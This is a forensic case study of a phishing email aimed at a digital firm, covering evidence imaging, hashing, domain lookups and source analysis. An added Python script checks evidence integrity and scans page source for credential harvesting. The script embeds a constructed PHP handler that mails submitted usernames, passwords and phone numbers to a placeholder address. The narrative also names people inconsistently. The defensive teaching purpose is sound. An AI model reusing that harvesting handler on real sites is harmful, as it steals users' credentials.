1. Case Summary:
Mrs. Poornima Rai, working as a Social Media Strategist at a firm called 'Next Gen Digital System', received an email with a promotional offer attached to it. She is an intelligent person who has always loved listening to music and reading books with coffee. She also has some knowledge of attacks carried out through email and their effects. Mrs. Pinky Sharma, CEO of 'Next Gen Digital System', called up Mr. Amar Chhetri, a certified Computer Forensic Investigator and Expert, and asked for his forensic services to perform an investigation to verify whether the email was a simple marketing promotion campaign, and to start legal action with the help of the Law Enforcement Authority.
2. Forensic Methodology:
a. Amar Chhetri accepted the investigation task and visited Mrs Sujan's office one working day.
b. He created a bit-stream image of the folder on the HDD that contains the Outlook .pst files using FTK Imager.
c. He also created MD5 hashes of the image to cross-check the integrity of the file during the investigation and court trial.
d. He moved the acquired image file into a folder protected and encrypted by TrueCrypt.
e. He prepared Chain-of-Custody documents and stored the evidence in a forensically secure place/device.
f. Mr. Amar was requested to investigate the following evidence:
i. The nature of the site received in the email
ii. Behaviour of the URL received
iii. Impacts of the programs behind the URL
g. He loaded the image file into FTK from the password-protected folder in the TrueCrypt file and secured the loaded contents with encryption and a passcode inside it.
h. An FTK search showed the reported URL in the mail system loaded from the acquired evidence.
i. He checked the phishing nature of the URL using https://phishtank.com, but could not get any confirmatory details, as the site was not listed in PhishTank's database.
j. He did a DNS analysis of the domain in the URL using www.dnsstuff.com and www.webdnstools.com.
k. He gathered the registrant details of the domain using SmartWhois and http://www.register.com/whois.rcmx.
l. He also gathered the web hosting company details using IPNetInfo.
m. He decided to perform forensic analysis of the source code in two modes: online, and as additional acquired evidence.
n. He installed Firebug on Firefox and found some suspicious PHP and JavaScript code on the site.
o. Further, he installed HTTrack Website Copier and acquired the source code as additional evidence.
p. In detailed analysis, he found that the URL was programmed to collect the username, password and phone number of Apple users and to send them to a programmed email address: admin.rajut@gmail.com.
q. He prepared a report using MS Word as well as FTK and concluded that the URL was a phishing site impersonating Apple and that its code had malicious intent.
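The two technical steps in the methodology above that an analyst repeats on every case are the integrity check of acquired evidence (step c) and the static review of acquired page source for credential collection and its destination (steps o and p). The following Python script is an added example illustrating both; it is not part of the original case report and not the investigator's tooling. The page source it scans is a constructed sample standing in for a website-copier acquisition, the recipient address collector@example.com is a placeholder rather than the address from the case, and the list of field names treated as sensitive is an assumption of the example.

```python
import hashlib
import re

# Constructed sample of an acquired page, standing in for a page saved by a
# website copier: a sign-in form collecting username, password and phone,
# and a PHP handler that emails the submitted values to a hard-coded address.
# The recipient address is a placeholder, not the one from the case.
ACQUIRED_SOURCE = """<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $body = "u=" . $_POST['username'] . " p=" . $_POST['password'] . " t=" . $_POST['phone'];
    mail("collector@example.com", "new entry", $body);
    header("Location: https://www.example.com/");
}
?>
<html><body>
<form method="post" action="index.php">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="tel" name="phone">
  <input type="hidden" name="campaign" value="promo">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""

# Field names the example treats as credential or contact data (an assumption
# of this example; extend it for the forms seen in a real acquisition).
SENSITIVE_FIELD_NAMES = {
    "username", "user", "login", "email", "password", "pass", "passwd",
    "pin", "phone", "tel", "mobile",
}


def md5_hex(data: bytes) -> str:
    """MD5 of the evidence bytes, as recorded in the chain-of-custody record."""
    return hashlib.md5(data).hexdigest()


def sha256_hex(data: bytes) -> str:
    """SHA-256 computed alongside MD5 so a collision-resistant value is on file too."""
    return hashlib.sha256(data).hexdigest()


def verify_integrity(data: bytes, recorded_md5: str) -> bool:
    """Re-hash the evidence and compare it with the value recorded at acquisition."""
    return md5_hex(data) == recorded_md5.lower()


def input_field_names(source: str) -> list[str]:
    """Names of all <input> elements in the page, in document order."""
    names = []
    for tag in re.findall(r"<input\b[^>]*>", source, flags=re.IGNORECASE):
        match = re.search(r'name\s*=\s*["\']?([^"\'\s>]+)', tag, flags=re.IGNORECASE)
        if match:
            names.append(match.group(1))
    return names


def sensitive_fields(source: str) -> list[str]:
    """Input names that collect credentials or contact details."""
    return [n for n in input_field_names(source) if n.lower() in SENSITIVE_FIELD_NAMES]


def mail_recipients(source: str) -> list[str]:
    """First argument of every PHP mail() call, i.e. where submitted data is sent."""
    return re.findall(r'\bmail\s*\(\s*["\']([^"\']+)["\']', source)


def form_actions(source: str) -> list[str]:
    """Targets that forms on the page post to."""
    return re.findall(r'<form\b[^>]*\baction\s*=\s*["\']?([^"\'\s>]+)', source, flags=re.IGNORECASE)


def analyse(source: str) -> dict:
    """Summarise the indicators an analyst would put in the report."""
    fields = sensitive_fields(source)
    recipients = mail_recipients(source)
    return {
        "sensitive_fields": fields,
        "mail_recipients": recipients,
        "form_actions": form_actions(source),
        # Credential fields plus an emailing handler is the pattern found in the case.
        "credential_harvesting": bool(fields) and bool(recipients),
    }


if __name__ == "__main__":
    evidence = ACQUIRED_SOURCE.encode()
    recorded_md5 = md5_hex(evidence)  # value written into the chain-of-custody record
    print("recorded MD5:", recorded_md5, "SHA-256:", sha256_hex(evidence))
    print("integrity verified:", verify_integrity(evidence, recorded_md5))
    print(analyse(ACQUIRED_SOURCE))
```

The hashes are computed on the acquired bytes before any analysis and re-checked before the findings are written up, which is the check the court trial relies on. The source scan is deliberately simple string matching over the acquired copy, so it runs on the evidence offline and never contacts the live site.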
3. Trial and Prosecution:
Based on the evidence prepared and produced, the registrant, who had himself programmed the site, was given a punishment of 3 years' jail term under various IT laws, including misuse of electronic communication.
Researched and Authored by: Amrit Chhetri, Principal IT Security Consultant, Certified Computer Forensics Investigator/Consultant, CPT, Social Media Consultant